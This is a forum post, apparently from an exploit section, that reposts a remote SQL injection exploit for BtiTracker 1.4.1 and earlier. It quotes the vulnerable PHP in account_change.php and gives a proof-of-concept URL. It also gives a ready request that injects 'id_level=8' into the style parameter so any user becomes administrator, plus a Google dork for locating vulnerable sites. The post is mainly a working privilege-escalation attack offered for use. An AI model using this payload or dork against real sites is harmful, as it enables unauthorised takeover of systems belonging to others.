Jump to content
Ras

BtiTracker <=v1.4.1 Remote SQL Injection Exploit

By Ras, in Exploituri

Recommended Posts

Ras Newbie

Ras

Posted
Posted 
#################################################################################
#
# BtiTracker <=v1.4.1 Remote SQL Injection Exploit
#
# Discovered by: m@ge|ozz - [email]babbano@gmail.com[/email]
# Vulnerabitity: Remote Sql Injection /
# Problem: Any user can be Administrator
# Website Vendor: [url]http://www.btiteam.org[/url]
#
# Vulnerable Code (account_change.php):
#
# if (isset($_GET["style"]))
# @mysql_query("UPDATE users SET style=$style WHERE id=".$CURUSER["uid"]);
#
# if (isset($_GET["langue"]))
# @mysql_query("UPDATE users SET language=$langue WHERE id=".$CURUSER["uid"]);
#
# PoC: account_change.php?style=2[SQL]&returnto=%2F
#
# Example to gain admin control: account_change.php?style=1,id_level=8 #
#
# GoogleDork: "by Btiteam"
#
# Shoutz: - eVolVe or Die -
#
#################################################################################

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...